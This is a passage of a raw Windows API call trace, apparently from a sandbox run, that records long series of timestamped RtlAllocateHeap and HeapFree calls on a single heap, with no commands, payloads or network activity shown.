Size=0x13200) returned 0x359c0d0 [0194.461] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x35af2e0 [0194.462] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x35c24f0 [0194.463] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x35d5700 [0194.464] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x35e8910 [0194.465] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x35fbb20 [0194.465] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x360ed30 [0194.466] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3621f40 [0194.467] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3635150 [0194.468] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3648360 [0194.468] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xed0) returned 0x59a6a0 [0194.469] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57c600 | out: hHeap=0x550000) returned 1 [0194.469] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x365b570 [0194.469] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x366e780 [0194.470] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3681990 [0194.470] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3694ba0 [0194.471] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x36a7db0 [0194.471] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x36bafc0 [0194.472] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x36ce1d0 [0194.473] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x36e13e0 [0194.474] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x36f45f0 [0194.474] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3707800 [0194.475] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x371aa10 [0194.475] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x372dc20 [0194.476] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3740e30 [0194.476] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3754040 [0194.660] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3767250 [0194.661] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x377a460 [0194.662] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x378d670 [0194.662] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x37a0880 [0194.663] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x37b3a90 [0194.664] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x37c6ca0 [0194.664] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x37d9eb0 [0194.676] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x37ed0c0 [0194.677] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38002d0 [0194.678] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38134e0 [0194.678] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38266f0 [0194.679] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3839900 [0194.679] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x384cb10 [0194.679] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x385fd20 [0194.680] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3872f30 [0194.680] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3886140 [0194.681] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3899350 [0194.683] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38ac560 [0194.684] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38bf770 [0194.684] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38d2980 [0194.685] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38e5b90 [0194.685] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x38f8da0 [0194.686] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x390bfb0 [0194.686] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x391f1c0 [0194.687] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39323d0 [0194.687] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39455e0 [0194.688] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39587f0 [0194.689] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x396ba00 [0194.689] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x397ec10 [0194.690] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3991e20 [0194.691] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39a5030 [0194.692] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39b8240 [0194.692] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39cb450 [0194.693] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39de660 [0194.693] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x39f1870 [0194.693] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a04a80 [0194.694] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a17c90 [0194.695] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a2aea0 [0194.695] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a3e0b0 [0194.696] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a512c0 [0194.696] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a644d0 [0194.697] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a776e0 [0194.697] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a8a8f0 [0194.698] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3a9db00 [0194.699] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3ab0d10 [0194.699] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3ac3f20 [0194.700] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3ad7130 [0194.700] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3aea340 [0194.700] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3afd550 [0194.701] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3b10760 [0194.702] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3b23970 [0211.313] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x587490 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5a7290 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5ba4a0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5cd6b0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5e08c0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5f3ad0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x606ce0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x619ef0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x62d100 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1e70080 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1e83290 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1e964a0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1ea96b0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1ebc8c0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1ecfad0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1ee2ce0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1ef5ef0 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1f09100 | out: hHeap=0x550000) returned 1 [0211.314] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1f1c310 | out: hHeap=0x550000) returned 1 [0211.315] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1f2f520 | out: hHeap=0x550000) returned 1 [0211.315] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x1f42730 | out: hHeap=0x550000) returned 1 [0211.315] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2010080 | out: hHeap=0x550000) returned 1 [0211.315] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2023290 | out: hHeap=0x550000) returned 1 [0211.315] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20364a0 | out: hHeap=0x550000) returned 1 [0211.315] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20496b0 | out: hHeap=0x550000) returned 1 [0211.315] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x205c8c0 | out: hHeap=0x550000) returned 1 [0211.663] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x206fad0 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2082ce0 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2095ef0 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20a9100 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20bc310 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20cf520 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20e2730 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x20f5940 | out: hHeap=0x550000) returned 1 [0211.664] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2108b50 | out: hHeap=0x550000) returned 1 [0211.669] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x211bd60 | out: hHeap=0x550000) returned 1 [0211.669] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x212ef70 | out: hHeap=0x550000) returned 1 [0211.669] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2142180 | out: hHeap=0x550000) returned 1 [0211.669] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2155390 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21685a0 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x217b7b0 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x218e9c0 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21a1bd0 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21b4de0 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21c7ff0 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21db200 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x21ee410 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2210080 | out: hHeap=0x550000) returned 1 [0211.670] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2223290 | out: hHeap=0x550000) returned 1 [0211.677] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x22364a0 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x22496b0 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x225c8c0 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x226fad0 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2282ce0 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2295ef0 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x22a9100 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x22bc310 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x22cf520 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x22e2730 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x22f5940 | out: hHeap=0x550000) returned 1 [0211.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2308b50 | out: hHeap=0x550000) returned 1 [0211.684] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x231bd60 | out: hHeap=0x550000) returned 1 [0211.684] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x232ef70 | out: hHeap=0x550000) returned 1 [0211.684] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2342180 | out: hHeap=0x550000) returned 1 [0211.684] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2355390 | out: hHeap=0x550000) returned 1 [0211.684] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x23685a0 | out: hHeap=0x550000) returned 1 [0211.685] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x237b7b0 | out: hHeap=0x550000) returned 1 [0211.685] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x238e9c0 | out: hHeap=0x550000) returned 1 [0211.685] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x23a1bd0 | out: hHeap=0x550000) returned 1 [0211.685] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x23b4de0 | out: hHeap=0x550000) returned 1 [0211.685] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x23c7ff0 | out: hHeap=0x550000) returned 1 [0212.104] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x23db200 | out: hHeap=0x550000) returned 1 [0212.106] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x23ee410 | out: hHeap=0x550000) returned 1 [0212.106] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2401620 | out: hHeap=0x550000) returned 1 [0212.106] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2414830 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2427a40 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x243ac50 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x244de60 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2461070 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2474280 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2487490 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x249a6a0 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x24ad8b0 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x24c0ac0 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x24d3cd0 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x24e6ee0 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x24fa0f0 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x250d300 | out: hHeap=0x550000) returned 1 [0212.111] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2520510 | out: hHeap=0x550000) returned 1 [0212.118] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2533720 | out: hHeap=0x550000) returned 1 [0212.118] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2546930 | out: hHeap=0x550000) returned 1 [0212.119] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2559b40 | out: hHeap=0x550000) returned 1 [0212.119] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x256cd50 | out: hHeap=0x550000) returned 1 [0212.119] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x257ff60 | out: hHeap=0x550000) returned 1 [0212.119] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2593170 | out: hHeap=0x550000) returned 1 [0212.119] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x25a6380 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x25b9590 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x25cc7a0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x25df9b0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x25f2bc0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2610080 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2623290 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x26364a0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x26496b0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x265c8c0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x266fad0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2682ce0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2695ef0 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x26a9100 | out: hHeap=0x550000) returned 1 [0212.120] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x26bc310 | out: hHeap=0x550000) returned 1 [0212.130] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x26cf520 | out: hHeap=0x550000) returned 1 [0212.132] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x26e2730 | out: hHeap=0x550000) returned 1 [0212.132] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x26f5940 | out: hHeap=0x550000) returned 1 [0212.132] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2708b50 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x271bd60 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x272ef70 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2742180 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2755390 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x27685a0 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x277b7b0 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x278e9c0 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x27a1bd0 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x27b4de0 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x27c7ff0 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x27db200 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x27ee410 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2801620 | out: hHeap=0x550000) returned 1 [0212.138] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2814830 | out: hHeap=0x550000) returned 1 [0212.547] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2827a40 | out: hHeap=0x550000) returned 1 [0212.548] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x283ac50 | out: hHeap=0x550000) returned 1 [0212.548] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x284de60 | out: hHeap=0x550000) returned 1 [0212.548] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2861070 | out: hHeap=0x550000) returned 1 [0212.548] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2874280 | out: hHeap=0x550000) returned 1 [0212.548] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2887490 | out: hHeap=0x550000) returned 1 [0212.548] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x289a6a0 | out: hHeap=0x550000) returned 1 [0212.549] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x28ad8b0 | out: hHeap=0x550000) returned 1 [0212.549] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x28c0ac0 | out: hHeap=0x550000) returned 1 [0212.549] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x28d3cd0 | out: hHeap=0x550000) returned 1 [0212.549] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x28e6ee0 | out: hHeap=0x550000) returned 1 [0212.549] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x28fa0f0 | out: hHeap=0x550000) returned 1 [0212.549] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x290d300 | out: hHeap=0x550000) returned 1 [0212.549] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2920510 | out: hHeap=0x550000) returned 1 [0212.555] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2933720 | out: hHeap=0x550000) returned 1 [0212.555] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2946930 | out: hHeap=0x550000) returned 1 [0212.555] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2959b40 | out: hHeap=0x550000) returned 1 [0212.555] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x296cd50 | out: hHeap=0x550000) returned 1 [0212.557] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x297ff60 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2993170 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x29a6380 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x29b9590 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x29cc7a0 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x29df9b0 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x29f2bc0 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a05dd0 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a18fe0 | out: hHeap=0x550000) returned 1 [0212.558] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a2c1f0 | out: hHeap=0x550000) returned 1 [0212.563] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a3f400 | out: hHeap=0x550000) returned 1 [0212.563] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a52610 | out: hHeap=0x550000) returned 1 [0212.563] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a65820 | out: hHeap=0x550000) returned 1 [0212.563] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a78a30 | out: hHeap=0x550000) returned 1 [0212.563] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a8bc40 | out: hHeap=0x550000) returned 1 [0212.566] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2a9ee50 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ab2060 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ac5270 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ad8480 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2aeb690 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2afe8a0 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree 